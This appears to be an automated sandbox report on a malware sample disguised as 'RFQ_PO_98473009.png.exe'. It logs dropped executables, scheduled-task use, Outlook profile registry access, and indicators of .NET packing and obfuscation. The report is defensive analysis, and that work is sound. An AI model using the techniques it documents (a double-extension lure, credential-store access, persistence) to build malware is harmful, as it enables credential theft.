                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAutomated click: Continue
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: RFQ_PO_98473009.png.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: RFQ_PO_98473009.png.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: _.pdb source: Native_New-Nova.exe, 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1263456666.0000000000628000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1263777573.0000000000628000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, tJDSOWc3BWGGq4Qa2q.cs.Net Code: eBZH8Brly9 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, tJDSOWc3BWGGq4Qa2q.cs.Net Code: eBZH8Brly9 System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                      Source: Native_snake01.exe.9.drStatic PE information: real checksum: 0x23bfb should be: 0x38b7d
                      Source: RFQ_PO_98473009.png.exeStatic PE information: real checksum: 0x0 should be: 0xd0e2c
                      Source: lVbhkOPdhyxT.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xd0e2c
                      Source: Native_New-Nova.exe.9.drStatic PE information: real checksum: 0x23bfb should be: 0x363da
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0040E21D push ecx; ret 10_2_0040E230
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0618378D pushad ; iretd 10_2_06183799
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_3_05C8DA5C push D005C8DAh; retf 12_3_05C8DA61
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_3_05C8DA5C push D005C8DAh; retf 12_3_05C8DA61
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_3_05C8DA5C push D005C8DAh; retf 12_3_05C8DA61
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_3_05C8DA5C push D005C8DAh; retf 12_3_05C8DA61
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_3_05C8DA5C push D005C8DAh; retf 12_3_05C8DA61
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_3_05C8DA5C push D005C8DAh; retf 12_3_05C8DA61
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0040E21D push ecx; ret 12_2_0040E230
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BE558 push eax; iretd 12_2_022BE559
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BFED1 push es; ret 12_2_022BFEE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C3562 push esp; iretd 12_2_061C3569
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06424F14 push es; ret 12_2_06424FC0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_067FA760 push eax; ret 12_2_067FA761
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_067F71F3 push es; ret 12_2_067F71F4
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_06945720 push es; ret 12_2_06945740
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0694D011 push es; retn 0004h12_2_0694D020
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0694DCA0 push es; ret 12_2_0694DCB0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_08362ABF push es; ret 12_2_08362AD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0849C051 push es; ret 12_2_0849C070
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0849AEF8 push eax; iretd 12_2_0849AEF9
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_09527A01 push es; retn 000Ch12_2_09527A10
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_09526AD0 push es; ret 12_2_09526AE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_095254EF push es; ret 12_2_095254F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_09521FB1 push es; ret 12_2_09521FC0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 18_2_05DF9B00 push esp; retf 05DDh18_2_05DF9CB1
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 18_2_06186E4B push es; retf 18_2_06186E4C
                      Source: RFQ_PO_98473009.png.exeStatic PE information: section name: .text entropy: 7.914079956714794
                      Source: lVbhkOPdhyxT.exe.0.drStatic PE information: section name: .text entropy: 7.914079956714794
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, LwPThgfLaOemDNfGyZ.csHigh entropy of concatenated method names: 'FIc7wXDiV1', 'Bhf7WoSDsr', 'wgH7Xl5fJT', 'HS07gEnuCS', 'cEL7cRC52X', 'tMVXo1nav8', 'X2tXyP26vX', 'zk0XeWaru5', 'rRWXPMe7mV', 'nm4X5fkgu7'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, rGDpxZKaqlGF0mXsfS.csHigh entropy of concatenated method names: 'nIAWqdkdmp', 'eqnWI99HAT', 'x1LWsvNpDc', 'R7qWkRZXsP', 'judWo2pK62', 'zK1WykhDh7', 'YjmWeN2yfY', 'IngWPAH0SZ', 'JVDW5EM8qu', 'WuWWiFM1KM'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, tJDSOWc3BWGGq4Qa2q.csHigh entropy of concatenated method names: 'AFnbwIAtSG', 'sUlb97SXYK', 'mhxbWRBR8s', 'GvpbOIJg3F', 'JfJbXlq5Pp', 'f63b7ktXqi', 'NjFbgcgTLd', 'my5bcUQDqf', 'X0abBFYGta', 'JaRbZ4ICWy'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, BNNes6zuWgY54P8mFR.csHigh entropy of concatenated method names: 'fOOvEX5C2g', 'cKjvKYpwQV', 'zx4v31ji4T', 'rtpvfYctKY', 'k3kvVrV8ih', 'vElvRlr2uX', 'kJ8vCItYOA', 'vysvnPueEb', 'ujMvdAFnU6', 'YgpvMsI7LC'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, yTPxsWGuuavb9FyWob.csHigh entropy of concatenated method names: 'hfY8ZuP7W', 'EC1mRQaP4', 'k9kEL0Uaq', 'MQVLF9Ihl', 'ghG3nPQ89', 'OLmDVomMc', 'pZhistvKwgDQ5aa3wn', 'mQ31oFUQf0TciQ8utC', 'nGmr2ogR4', 'zTYvCU9gS'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, TxCZi3DW0nYPtZIDxj.csHigh entropy of concatenated method names: 'eqwXplOEYN', 'JcDXLn0aCH', 'BQFOhQq1C1', 'FK0ORbd1hv', 'OlJOCR65mc', 'n5EOlcCoKU', 'tZ7O68QhC7', 'woFO19TxVI', 'TYaOJQO4r6', 'EAvOF7Zb7W'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, tm4DAMWXqKqTsgwPCZ.csHigh entropy of concatenated method names: 'Dispose', 'fKQS5RFKHU', 'v1KGVl8SNY', 'r9roBs9Xqq', 'mIHSipTd5K', 'UAlSzDTYTF', 'ProcessDialogKey', 'x0vGTLhFCj', 'NScGSH9ZYO', 'xn9GGgiUAa'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, mLLEqSHr5ZfiDPsPVl.csHigh entropy of concatenated method names: 'k2rSgGDpxZ', 'oqlScGF0mX', 'EVaSZ9E5fd', 'Q8RSYnkxCZ', 'mIDSaxj6wP', 'ahgStLaOem', 'nL9XisovJvrmYiYpPA', 'cRW87U3Z2Dw7rB1RaG', 'Dx4SSI15Rn', 'ChWSbc1x4I'
